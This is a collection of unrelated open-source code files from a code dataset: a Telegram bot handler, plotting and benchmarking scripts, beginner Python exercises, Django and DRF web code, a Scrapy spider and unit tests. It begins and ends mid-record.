_(\"Назад\") in in_text:\n await intention_to_me(message, state)\n return\n elif _(\"Меню\") in in_text:\n await global_menu(message)\n return\n\n\n@dp.message_handler(state=IntentionTo.obligation_forgive_proof)\nasync def obligation_to_me_forgive(message: types.Message, state: FSMContext):\n in_text = message.text\n await bot.delete_message(message.chat.id, message.message_id)\n data = await state.get_data()\n id_obligation_to = data[\"id_obligation_to\"]\n obligation = await dbs.intentions.get_intention_from_id(id_obligation_to)\n\n if _(\"Да\") in in_text:\n text_from = await text_final_forgive_obligation_from(id_obligation_to)\n text_to = await text_forgive_obligation_to(id_obligation_to)\n\n await dbs.intentions.update_status_from_id(id_obligation_to, status=0, active=0)\n\n await bot.send_message(message.chat.id, text_from)\n await bot.send_message(obligation.from_id, text_to)\n\n await 
global_menu(message)\n return\n elif _(\"Нет\") in in_text:\n text_obligation = await text_obligation_to(id_obligation_to)\n\n markup_obligation_settings_kb = await check_obligation_for_me()\n await IntentionTo.obligation_settings.set()\n\n await bot.send_message(message.chat.id, text_obligation, reply_markup=markup_obligation_settings_kb)\n return","repo_name":"exodus-media/exodusbot_aiogram","sub_path":"handlers/organaiser/intention_to_me.py","file_name":"intention_to_me.py","file_ext":"py","file_size_in_byte":7205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9596721543","text":"#!/usr/bin/env python3.7\n# -*- coding: utf8 -*-\n\nimport matplotlib as mat\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\n\nsns.set(rc={\"figure.figsize\":(8,4)})\nsns.set_context('paper',font_scale=1.5,rc={'lines.linewidth':1.5})\nsns.set_style('ticks')\nmat.rc('text',usetex=True)\nmat.rc('text.latex',preamble=r'\\usepackage[utf8]{inputenc}\\usepackage[T1]{fontenc}\\usepackage[spanish]{babel}\\usepackage{mathpazo}\\usepackage[euler-digits,euler-hat-accent]{eulervm}\\usepackage{amsmath,amsfonts,amssymb}\\usepackage{siunitx}')\n\nx=np.loadtxt('scibar-sim.csv',delimiter=',',comments='#')\ntns=x[0:75,1]\nnew=x[75:150,1]\nold=x[150:,1]\nt=np.arange(-1300,3200,60)\nc=sns.color_palette('deep')\nfig,ax=plt.subplots(nrows=1,ncols=1,sharex=False,sharey=False)\nax.plot(t,tns,ds='steps-mid')\nax.plot(t,old,ds='steps-mid')\nax.plot(t,new,ds='steps-mid')\nax.set_xlim(-1000,3000)\nax.set_ylim(6.2e4,7.4e4)\nax.axvline(x=0,color='black',ls=':')\nax.set_xlabel(r'Tiempo $\\left[\\si{\\second}\\right]$',x=0.9,ha='right')\nax.set_ylabel(r'Cuentas TNS $\\left[\\si{\\per\\minute}\\right]$')\nplt.tight_layout(pad=1.0)\nplt.savefig('scibar-sim.pdf')\nplt.show()\n","repo_name":"anzorenam/tesis","sub_path":"images/scibar-sim.py","file_name":"scibar-sim.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16665939314","text":"#input: original rank, group information\n#output: an alternative P-Fair rank where the Kendall Tau distance is minimized.\n\nimport pandas as pd\nimport numpy as np\nimport timeit\nimport csv\n\n\ndef GrBinaryIPF(rank,group):\n Rho0 = []\n Rho1 = []\n for i in rank:\n if group[i] == 1:\n Rho0.append(i)\n else:\n Rho1.append(i)\n\n j = 1\n rankDic = {}\n for itm in rank:\n rankDic[itm] = j\n j = j + 1\n\n urgent = []\n Rout = []\n P1count = 0\n P0count = 0\n\n Fp0 = len(Rho0)/len(rank)\n Fp1 = len(Rho1)/len(rank)\n\n i = 1\n while len(Rho0) != 0 or len(Rho1) != 0:\n #print(Rout)\n if P1count >= len(Rho1):\n Rout.extend(Rho0[P0count:len(Rho0)])\n return Rout\n if P1count >= len(Rho0):\n Rout.extend(Rho1[P1count:len(Rho1)])\n return Rout\n\n if len(urgent) == 0:\n if rankDic[Rho1[P1count]] < rankDic[Rho0[P0count]]:\n Rout.append(Rho1[P1count])\n P1count = P1count + 1\n else:\n Rout.append(Rho0[P0count])\n P0count = P0count + 1\n else:\n if urgent[0] == 'P1':\n Rout.append(Rho1[P1count])\n P1count = P1count + 1\n else:\n Rout.append(Rho0[P0count])\n P0count = P0count + 1\n urgent = []\n # update urgent\n if Fp1 * (i + 1) - P1count >= 1:\n urgent.append('P1')\n\n if Fp0 * (i + 1) - P0count >= 1:\n urgent.append('P0')\n i = i + 1\n #print(i)\n return Rout\n\n\nn_list = [1000,250000,500000,750000,1000000]\nm_list = [10000000]\nm = m_list[0]\n\nwith open('fig_5a_result.csv', 'w', encoding='UTF8') as f:\n writer = 
csv.writer(f)\n for n in n_list:\n file_lc = r'Data\single_binary\normal_data_Lc_n='+str(n)+'_m='+str(m)+'.csv'\n df_lc = pd.read_csv(file_lc,header = None)\n Lc = df_lc.to_numpy()[0]\n\n file_lv = r'Data\single_binary\normal_data_Lv_n=' + str(n) + '_m='+str(m)+'.csv'\n df_lv = pd.read_csv(file_lv, header=None)\n Lv = df_lv.to_numpy()[0]\n\n file_a = r'Data\single_binary\normal_data_a_n=' + str(n) + '_m='+str(m)+'.csv'\n df_group = pd.read_csv(file_a, header=None)\n group = df_group.to_numpy()[0]\n\n rank = np.argsort(Lv)\n start = timeit.default_timer()\n out = GrBinaryIPF(rank,group)\n end = timeit.default_timer()\n print(\"n = \",n,\" time = \",end - start)\n result = [n,end-start]\n writer.writerow(result)","repo_name":"MdMouinulIslam/RankAggregationProportionate","sub_path":"graphs/Fig_5a_code.py","file_name":"Fig_5a_code.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2185575167","text":"# Exercise 6.19 - Sets 1\n\ndef getRepete(A):\n L = list(A) # auxiliary list\n L.sort() # sort the list\n conj = set(list(L)) # build a set from that list\n conj = list(conj) # convert the set back to a list\n conj.sort() # sort the second list\n tam = len(conj) # length of the second list \n x = 0 # index into the first list \n while tam > 0: # while the list being compared is non-empty\n if conj[0] == L[x]: # delete both numbers when they match\n del conj[0]\n del L[x]\n else: \n x += 1 # advance the index on the duplicates list, since a duplicate was found\n tam = len(conj) # recompute the remaining list length\n return L # return the list of repeated values\n\n\nA = [1, 3, 4, 4, 5, 6, 7, 7]\nB = [1, 2, 2, 5, 6, 7, 8, 9]\n\na = set(list(A))\nb = set(list(B)) \n\nprint(f\"\\nComuns: {a|b}\")\nprint(f\"somente em A: {a-b}\")\nprint(f\"somente em B: {b-a}\")\n\nc = set(A+B) # concatenate the two lists and convert to a set\nd = getRepete(A) + getRepete(B) # concatenate the elements that repeat within each list\nd = set(d) # convert to a set\nprint(f\"união não repetem: {c-d}\")\n\ne = set(getRepete(B))\nprint(f\"Primeira sem os repetidos na segunda: {a-e}\\n\")\n\n\n","repo_name":"lucasfstos95/PythonCodes","sub_path":"Exercicios IAPCP/exercicio_6_19.py","file_name":"exercicio_6_19.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24390056535","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path, include\nfrom . 
import views\n\napp_name = \"APP\"\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"index.html\", views.index, name=\"index2\"),\n path(\"services.html\", views.services, name=\"services\"),\n path(\"blog-home.html\", views.BlogListView.as_view(), name=\"blog\"),\n path(\"team.html\", views.team, name=\"team\"),\n path(\"contact.html\", views.contact, name=\"contact\"),\n path(\"details/<slug>\", views.BlogDetailView.as_view(), name=\"details\"),\n\n\n\n\n]\n","repo_name":"Chukslord1/PDP","sub_path":"APP/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"585705738","text":"import pickle\nfrom unittest.mock import MagicMock\nfrom unittest.mock import patch\n\nimport pytest\nimport torch\n\nfrom innofw.zoo import upload_model\n\n\n@patch(\"innofw.utils.s3_utils.credentials.get_s3_credentials\")\n@patch(\"innofw.utils.s3_utils.S3Handler.upload_file\")\n@patch(\"builtins.input\")\n@pytest.mark.parametrize(\n [\"remote_save_path\", \"experiment_config_path\", \"metrics\"],\n [\n [\n \"https://api.blackhole.ai.innopolis.university/pretrained/model.pickle\",\n \"classification/DS_190423_8dca23dc_ucmerced.yaml\",\n {\"some metric\": 0.04},\n ]\n ],\n)\ndef test_upload_model(\n mock_get_s3_credentials,\n mock_upload_file,\n mock_input,\n tmp_path,\n experiment_config_path,\n remote_save_path,\n metrics,\n):\n ckpt_path = tmp_path / \"model.pkl\"\n with open(ckpt_path, \"wb+\") as f:\n pickle.dump(torch.nn.Module(), f)\n\n mock_input.side_effect = [\"access_key\", \"secret_key\"]\n mock_get_s3_credentials.return_value = MagicMock()\n mock_upload_file.return_value = remote_save_path\n\n # Call the function being tested\n upload_model(\n experiment_config_path,\n ckpt_path,\n remote_save_path,\n metrics,\n )\n\n # Assert that the expected functions were called with the expected arguments\n mock_upload_file.assert_called_once()\n\n\n # Test case 1: Try to upload a file that doesn't exist and check if it raises an exception.\n with pytest.raises(Exception):\n upload_model(\n experiment_config_path,\n \"invalid\",\n remote_save_path,\n metrics,\n )\n","repo_name":"InnopolisUni/innofw","sub_path":"tests/unit/zoo/test_upload.py","file_name":"test_upload.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"11328274642","text":"# input : aaabccddd\n# ouput : abd\n# explanation : aaabccd -> abccd -> abd\n\n\ndef removalPairElements(string):\n i = 1\n while i < len(string):\n if string[i-1] == string[i]:\n string = string[0:i-1] + string[i+1:]\n i = 1\n i = i+1\n \n if not string:\n print(\"\\nEmpty !\")\n else:\n print(\"\\nReduced String: \"+ string)\n\n\nif __name__ == \"__main__\":\n string = str(input(\"\\nEnter the String: \"))\n\n removalPairElements(string)\n print(\"\\n\")","repo_name":"maxkashyap41/pythonDSA","sub_path":"String/removingPairCharacters.py","file_name":"removingPairCharacters.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15305705846","text":"from rest_framework import serializers\nfrom ECG.models import Report, Patient, Doctor\nfrom drf_extra_fields.relations import PresentablePrimaryKeyRelatedField\n\n\nclass DoctorSerializer(serializers.ModelSerializer):\n class Meta:\n model =Doctor\n fields = '__all__'\n\nclass 
PatientSerializer(serializers.ModelSerializer):\n Doctor = PresentablePrimaryKeyRelatedField(\n queryset=Doctor.objects.all(),\n presentation_serializer=DoctorSerializer,\n read_source=None,\n required = False\n )\n\n class Meta:\n model = Patient\n fields = '__all__'\n\nclass ReportSerializer(serializers.ModelSerializer):\n Patient = PresentablePrimaryKeyRelatedField(\n queryset=Patient.objects.all(),\n presentation_serializer=PatientSerializer,\n read_source=None,\n required = False\n )\n\n class Meta:\n model = Report\n fields = '__all__'\n\n","repo_name":"mahdishirvani79/ECG","sub_path":"ECG_backend/ECG/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3221346327","text":"'''\ncode to use voxelized GVDs to compute closest point on a mesh to query points\n'''\nimport numpy as np\n\nfrom numba import njit\n\nfrom point2mesh.util.ArrayTricks import threeD_multi_to_1D\n\nfrom point2mesh import triangle_mesh\n\n@njit\ndef point2mesh_closest_cpu(query_point,triangles,voxels2triangles,candidate_triangles,minimums,spacing,domain_width,tol):\n '''\n compute the closest point on a set of triangles to a query point\n\n Parameters: query_point : (3,) float array\n the query point, must be within the domain the voxelization was constructed for\n triangles : (ntri*9,) float array\n the triangle array, flattened\n voxels2triangles : (n_voxel,) integer array\n each entry stores the first index in candidate_triangles that corresponds to that voxel\n candidate_triangles : (max(voxels2triangles)+1,) integer array\n array of triangle indices. This is the concatenation of the arrays of triangles that correspond to each voxel\n minimums : (3,) float array\n the minimum x-y-z position inside the voxelization\n spacing : float\n the edge length of the voxels\n domain_width : (3,) int array\n the number of voxels in each dimension\n tol : float\n the tolerance to use for point to triangle calculations\n Returns: closest_point : (3,) float array\n the coordinates of the closest point on a triangle to query_point. 
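For the serializers in the record above, drf-extra-fields' PresentablePrimaryKeyRelatedField makes writes accept a primary key while reads embed the nested representation. A hypothetical pair of payloads (all field values here are invented for illustration):

```python
# POST/PUT body: the client sends only the related object's primary key.
write_payload = {"Patient": 7}

# GET response: the same field is rendered with PatientSerializer, which in
# turn presents its Doctor via DoctorSerializer.
read_payload = {
    "id": 1,
    "Patient": {"id": 7, "Doctor": {"id": 3}},
}
```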
NaNs if query_point is outside the voxelization\n squared_distance : float\n the squared distance from the closest_point to the query_point\n count : int\n the number of triangles closest point was computed for\n '''\n int_idx=((query_point-minimums)//spacing).astype(np.int64)\n closest_point=np.array([np.nan,np.nan,np.nan])\n if np.any(int_idx>=domain_width) or np.any(int_idx<0):\n return closest_point,np.inf,0\n else:\n array_pos=threeD_multi_to_1D(int_idx[0],int_idx[1],int_idx[2],domain_width)\n triangle_id_start=voxels2triangles[array_pos]\n triangle_id_end=voxels2triangles[array_pos+1]\n triangle_ids=candidate_triangles[triangle_id_start:triangle_id_end]\n mindistsquared=np.inf\n for triangle_id in triangle_ids:\n idx=triangle_id*9\n cx,cy,cz=triangle_mesh.cuda_closest_point_on_triangle(triangles[idx:idx+9],query_point,tol)\n ex=query_point[0]-cx\n ey=query_point[1]-cy\n ez=query_point[2]-cz\n candidate_dist_squared=ex*ex+ey*ey+ez*ez\n if candidate_dist_squared<mindistsquared:\n mindistsquared=candidate_dist_squared\n closest_point[0]=cx\n closest_point[1]=cy\n closest_point[2]=cz\n return closest_point,mindistsquared,len(triangle_ids)\n\n@njit\ndef closest_point_on_mesh_via_cpu_serial(points,triangles,voxels2triangles,candidate_triangles,minimums,spacing,domain_width):\n '''\n compute the closest point on a set of triangles to query points\n\n Parameters: points : (npts,3) float array\n the query points, must be within the domain the voxelization was constructed for (returns nans for closest point if this fails)\n triangles : (ntri*9,) float array\n the triangle array, flattened\n voxels2triangles : (n_voxel,) integer array\n each entry stores the first index in candidate_triangles that corresponds to that voxel\n candidate_triangles : (max(voxels2triangles)+1,) integer array\n array of triangle indices. This is the concatenation of the arrays of triangles that correspond to each voxel\n minimums : (3,) float array\n the minimum x-y-z position inside the voxelization\n spacing : float\n the edge length of the voxels\n domain_width : (3,) int array\n the number of voxels in each dimension\n tol : float\n the tolerance to use for point to triangle calculations\n Returns: closest_point : (npts,3) float array\n the coordinates of the closest point on a triangle to query_point. 
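The lookup above flattens a 3-D voxel index into a 1-D array position with threeD_multi_to_1D. A plausible row-major stand-in (the real point2mesh.util.ArrayTricks implementation may differ), cross-checked against numpy's equivalent:

```python
import numpy as np

def threeD_multi_to_1D(i, j, k, domain_width):
    # Row-major (C-order) flattening of the integer voxel index (i, j, k).
    return (i * domain_width[1] + j) * domain_width[2] + k

domain_width = np.array([4, 5, 6])
assert threeD_multi_to_1D(1, 2, 3, domain_width) == \
    np.ravel_multi_index((1, 2, 3), tuple(domain_width))  # both give 45
```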
row is NaNs if query_point is outside the voxelization\n squared_distances : (npts,) float array\n the squared distance from the closest_point to the query_point\n count : (npts,) int array\n the number of triangles closest point was computed for\n '''\n closest_points=np.empty_like(points)\n squared_distances=np.empty(len(points))\n counts=np.empty(len(points),dtype=np.int64)\n tol=1e-12\n for i,point in enumerate(points):\n closest_points[i],squared_distances[i],counts[i]=point2mesh_closest_cpu(point,triangles,voxels2triangles,candidate_triangles,minimums,spacing,domain_width,tol)\n return closest_points,squared_distances,counts","repo_name":"biorobotics/point2mesh-prune","sub_path":"point2mesh/voxelized/closest.py","file_name":"closest.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25616298313","text":"try:\r\n X = eval(input(\"請輸入被除數X:\"))\r\n Y = eval(input(\"請輸入除數Y:\"))\r\n Z = X / Y\r\nexcept ZeroDivisionError:\r\n print(\"除數不得為0\")\r\nexcept Exception as e1:\r\n print(e1.args)\r\nelse:\r\n print(\"沒有捕捉到例外!X除以Y的結果等於\", Z)\r\nfinally:\r\n print(\"離開try…except區塊\")\r\n","repo_name":"MyDearGreatTeacher/python2022","sub_path":"教科書/Ch08/except2.py","file_name":"except2.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"2398698595","text":"import socket\n\ntry:\n from app.modules.logger import create_log\n from app.modules.config import *\nexcept ImportError:\n from modules.logger import create_log\n from modules.config import *\n\nHOST, PORT = raspi_ip, raspi_socket_port_on_off\n\ntry:\n logger = create_log(webserver_logger)\nexcept:\n logger = create_log(raspi_logger)\n\n\ndef relay_on_off(state: str):\n data = state.encode()\n\n # Create a socket (SOCK_STREAM means a TCP socket)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n try:\n # Connect to server and send data\n sock.connect((HOST, PORT))\n sock.sendall(bytes(data))\n except OSError as err:\n logger.error(err)\n finally:\n sock.close()\n","repo_name":"kave06/tfg","sub_path":"app/model/webserver_client_socket_on_off.py","file_name":"webserver_client_socket_on_off.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24624627157","text":"# Resolução pergunta 2:\n\nnum = int(input('Insira um número: '))\n\ndef fib(n):\n if n > 1:\n return fib(n-1) + fib(n-2)\n return n\n\nfor i in range(num):\n print(fib(i))","repo_name":"MuriloMaranzati/Target","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17977978789","text":"\ndef variable_splitter(df):\n\n '''This function takes in a dataframe, and outputs several X and Y variable subsets for the Flaredown Capstone project. 
Those Variable Lists include:\n \n o y = The DV (target)\n o Several IV (X) subsets: \n o All Variables\n o Basic Variables (age, gender (female, other), total logs, total unique date days, total log rate, conditions total, symptoms total and fibro comorbidities)\n o Symptom / Condition Binaries\n o Symptom / Condition Total Logs\n o Symptom / Condition Activity\n o Symptom / Condition Log Rate\n '''\n import pandas as pd\n\n # make sure we were given a dataframe\n assert isinstance(df, pd.DataFrame), f\"Please enter a dataframe, you entered a {type(df)} data type\"\n\n df = df.drop(columns=['gender', 'country', 'male'])\n\n # extracting the target\n y = df['target']\n\n #Creating the X variables\n\n # all\n X_all = df.copy()\n X_all.drop(columns='target', inplace=True)\n\n # Basic\n X_basic = df[['ids','age', 'female', 'other', 'total_logs',\n 'total_unique_dates_days', 'total_log_rate', 'conditions_total', 'symptoms_total',\n 'fibro_comorbidities']]\n \n all_cols = list(X_all.columns)\n columns_new = list()\n X_basic_list = list(X_basic.columns)\n\n for col in all_cols:\n if col not in X_basic_list:\n columns_new.append(col)\n\n # creating the other X variables: binary, total logs, activity, log rate, and unique dates\n X_CS_binaries_list = list()\n X_CS_total_logs_list = list()\n X_CS_activity_list = list()\n X_CS_log_rate_list = list()\n X_CS_unique_dates_list = list()\n\n print(\"Total Condition / Symptom Binary length\", len(X_CS_binaries_list))\n print(\"Total logs length:\", len(X_CS_total_logs_list))\n print(\"Median activity length:\",len(X_CS_activity_list))\n print(\"Log rate length:\",len(X_CS_log_rate_list))\n print(\"Unique dates length:\",len(X_CS_unique_dates_list))\n\n for col in columns_new:\n if \"_activity\" in col:\n X_CS_activity_list.append(col)\n elif '_total_logs' in col:\n X_CS_total_logs_list.append(col)\n elif \"_log_rate\" in col:\n X_CS_log_rate_list.append(col)\n elif \"_unique_dates_days\" in col:\n X_CS_unique_dates_list.append(col)\n\n # adding the basic variables into each list\n X_CS_binaries_list = X_basic_list + X_CS_binaries_list \n X_CS_total_logs_list = X_basic_list + X_CS_total_logs_list\n X_CS_activity_list = X_basic_list + X_CS_activity_list\n X_CS_log_rate_list = X_basic_list + X_CS_log_rate_list\n X_CS_unique_dates_list = X_basic_list + X_CS_unique_dates_list\n\n # creating condition and symptom binaries\n to_remove = X_CS_total_logs_list + X_CS_activity_list + X_CS_log_rate_list + X_CS_unique_dates_list\n\n for col in all_cols:\n if col not in to_remove:\n X_CS_binaries_list.append(col)\n\n print(\"Total Condition / Symptom Binary length\", len(X_CS_binaries_list))\n print(\"Total logs length:\", len(X_CS_total_logs_list))\n print(\"Median activity length:\",len(X_CS_activity_list))\n print(\"Log rate length:\",len(X_CS_log_rate_list))\n print(\"Unique dates length:\",len(X_CS_unique_dates_list))\n\n # Creating X variables\n\n X_CS_binary = df[X_CS_binaries_list]\n X_CS_total_logs = df[X_CS_total_logs_list]\n X_CS_activity = df[X_CS_activity_list]\n X_CS_log_rate = df[X_CS_log_rate_list]\n X_CS_unique_dates = df[X_CS_unique_dates_list]\n\n # returning them\n\n return y, X_all, X_basic, X_CS_binary, X_CS_total_logs, X_CS_activity, X_CS_log_rate, X_CS_unique_dates\n","repo_name":"Saz2049/Flaredown-App","sub_path":"scripts/variable_splitter.py","file_name":"variable_splitter.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
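Assuming the variable_splitter function above is in scope, a hypothetical one-row frame with just enough columns exercises the split; real Flaredown frames carry many more per-symptom/condition columns:

```python
import pandas as pd

# 'headache*' columns are invented to stand in for one tracked symptom.
cols = ['ids', 'age', 'female', 'other', 'gender', 'country', 'male',
        'total_logs', 'total_unique_dates_days', 'total_log_rate',
        'conditions_total', 'symptoms_total', 'fibro_comorbidities',
        'headache', 'headache_activity', 'headache_total_logs',
        'headache_log_rate', 'headache_unique_dates_days', 'target']
df = pd.DataFrame([[0] * len(cols)], columns=cols)

y, X_all, X_basic, X_bin, X_logs, X_act, X_rate, X_dates = variable_splitter(df)
print(X_act.columns.tolist())  # the basic columns plus 'headache_activity'
```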
+{"seq_id":"26481940307","text":"#!/usr/bin/env python3\nimport argparse\nimport os\n\nfrom unittest import TestCase\n\nfrom cm_boy.CmAlgo import CmAlgo\nfrom tests.test_data.TestDataProvider import TestDataProvider\n\n\nclass test_CmAlgo(TestCase):\n\n def setUp(self):\n self.config = TestDataProvider().provide_config()\n self.test_listing = TestDataProvider().provide_listing_id_27()\n self.test_card = TestDataProvider().provide_example_card_id_27()\n self.parser = argparse.ArgumentParser(description='This Boy handles all the cardmarket stuff, good boy!')\n self.setup_parser()\n args = self.parser.parse_args([\"-d\", \"-q\"])\n args.outFile = None\n self.uut = CmAlgo(self.config, args)\n\n def test_card_in_range(self):\n result = self.uut.is_position_in_range(self.test_card, self.test_listing, 50, os.environ[\"cm_user_name\"])\n self.assertTrue(result)\n\n def test_card_already_min(self):\n result = self.uut.is_price_of_card_already_min(self.test_card)\n self.assertFalse(result)\n\n def test_patch_price_of_target_offer(self):\n result = self.uut.match_price_of_target_offer(self.test_card, self.test_listing)\n self.assertTrue(result)\n self.assertEqual(self.test_card[\"price\"], 0.04)\n\n def setup_parser(self):\n self.parser.add_argument(\"-d\", \"--dryrun\", action=\"store_true\", help=\"Do NOT upload the cards with adjusted prices.\")\n self.parser.add_argument(\"-q\", \"--quiet\", action=\"store_true\", help=\"Disable all output to the command line.\")\n self.parser.add_argument(\"-f\", \"--forcePriceSet\", action=\"store_true\", help=\"Regardless of the current position, update the prices.\")\n self.parser.add_argument(\"-o\", \"--outFile\", action=\"store_true\", help=\"Regardless of the current position, update the prices.\")\n","repo_name":"SoftPofi/cm-boy","sub_path":"tests/test_CmAlgo.py","file_name":"test_CmAlgo.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"30939496312","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy import Request\nimport json\n\n\nclass ImagesSpider(scrapy.Spider):\n BASE_URL = 'https://image.so.com/zj?ch=art&sn=%s&listtype=new&temp=1'\n start_index = 0\n\n # 限制最大下载数量,防止磁盘用量过大\n MAX_DOWNLOAD_NUM = 1000\n\n name = \"images\"\n allowed_domains = [\"image.so.com\"]\n start_urls = [BASE_URL % 0]\n\n def parse(self, response):\n # 使用 json 模块解析响应结果\n infos = json.loads(response.body.decode('utf8'))\n # 提取所有图片下载 url 到一个列表,赋给 item 的'image_urls'字段\n yield {'image_urls': [info['qhimg_url'] for info in infos['list']]}\n\n # 如 count 字段大于0,并且下载数量不足 MAX_DOWNLOAD_NUM,继续获取下一页图片信息\n self.start_index += infos['count']\n if infos['count'] > 0 and self.start_index < self.MAX_DOWNLOAD_NUM:\n yield Request(self.BASE_URL % self.start_index)","repo_name":"Rockyzsu/ScrapyBook","sub_path":"so_image/so_image/spiders/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"44564475385","text":"from sys import exit\nfrom textwrap import dedent\n\ndef imprimir_resultado():\n print(\"Se eligió la opción \", valor3, \" y el resultado es: \", r)\n\nvalor1 = int(input(\"Ingrese primer numero: \"))\nvalor2 = int(input(\"Ingrese segundo numero: \"))\nr = 0\n##\nvalor_random = \"borrar\"\n##\n##\nprint(dedent(\"\"\"\n Ingrese 1 si desea sumar los dos valores.\n Ingrese 2 si desea restar al 1er valor el 2do numero.\n Ingrese 3 si desea multiplicar el 
1er valor por 2do numero.\n Ingrese 4 si desea interrumpir este programa.\n \"\"\"))\n\nvalor3 = int(input(\"Ingrese respuesta: \"))\n\nif valor3 not in range(1,5): \n exit\n \nelse: \n\n if valor3 == 1:\n r = valor1 + valor2\n imprimir_resultado()\n \n elif valor3 == 2:\n r = valor1 - valor2\n imprimir_resultado()\n \n elif valor3 == 3:\n r = valor1 * valor2\n imprimir_resultado()\n \n elif valor3 == 4:\n print(\"Opción incorrecta.\")\n \n \n","repo_name":"simonvaru/ejercicios-de-clase-4","sub_path":"desafio3_1+.py","file_name":"desafio3_1+.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32089102842","text":"from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db import models, transaction\n\nfrom .api import Reddit\n\n\nclass PostsManager(models.Manager):\n\n @staticmethod\n def create_all(posts):\n\n before_count = Posts.objects.count()\n failed_count = 0\n\n for o in posts:\n with transaction.atomic():\n try:\n Posts.objects.create(\n id=o.id,\n author=o.author,\n title=o.title,\n media=o.media,\n preview=o.preview.get('images')[0] if hasattr(o, 'preview') else None,\n flair=o.link_flair_text,\n is_self=o.is_self,\n over_18=o.over_18,\n subreddit=o.subreddit,\n score=o.score,\n created=o.created,\n created_utc=o.created_utc,\n url=o.url,\n thumbnail=o.thumbnail,\n permalink=Reddit().api + o.permalink\n )\n except:\n failed_count = failed_count + 1\n\n after_count = Posts.objects.count()\n created_count = after_count - before_count\n\n return created_count, failed_count\n\n def pagination(self, page=1, limit=25, newest=True, **filters):\n posts = Posts.objects.filter(**filters).order_by('-created_utc' if newest else 'created_utc')\n paginator = Paginator(posts, limit)\n\n try:\n data = paginator.page(page)\n except PageNotAnInteger:\n data = paginator.page(1)\n except EmptyPage:\n data = paginator.page(paginator.num_pages)\n\n # return data, paginator\n return data, paginator\n\n\nclass Posts(models.Model):\n id = models.CharField(max_length=50, primary_key=True)\n author = models.CharField(max_length=100)\n title = models.TextField(unique=True)\n media = models.TextField(null=True, blank=True)\n preview = models.TextField(null=True, blank=True)\n flair = models.CharField(max_length=100, null=True, blank=True)\n is_self = models.BooleanField()\n over_18 = models.BooleanField()\n subreddit = models.CharField(max_length=255)\n score = models.PositiveIntegerField(default=0)\n created = models.CharField(max_length=100)\n created_utc = models.CharField(max_length=100, default='-')\n url = models.URLField()\n permalink = models.URLField()\n thumbnail = models.URLField()\n\n objects = PostsManager()\n","repo_name":"calinvladth/history","sub_path":"2020/3_good_news/server/posts/reddit/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69991912487","text":"import numpy as np\nfrom dataclasses import dataclass\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\n\n# Assumptions:\n# label = 0 -> undefined\n# label = -1 -> noise\n\n@dataclass\nclass Point:\n location: np.array\n label: int\n\ndef evaluate(labels, labels_true, X, visualize):\n # Number of clusters in labels, ignoring noise if present.\n n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\n n_noise_ = list(labels).count(-1)\n\n print(\"Estimated 
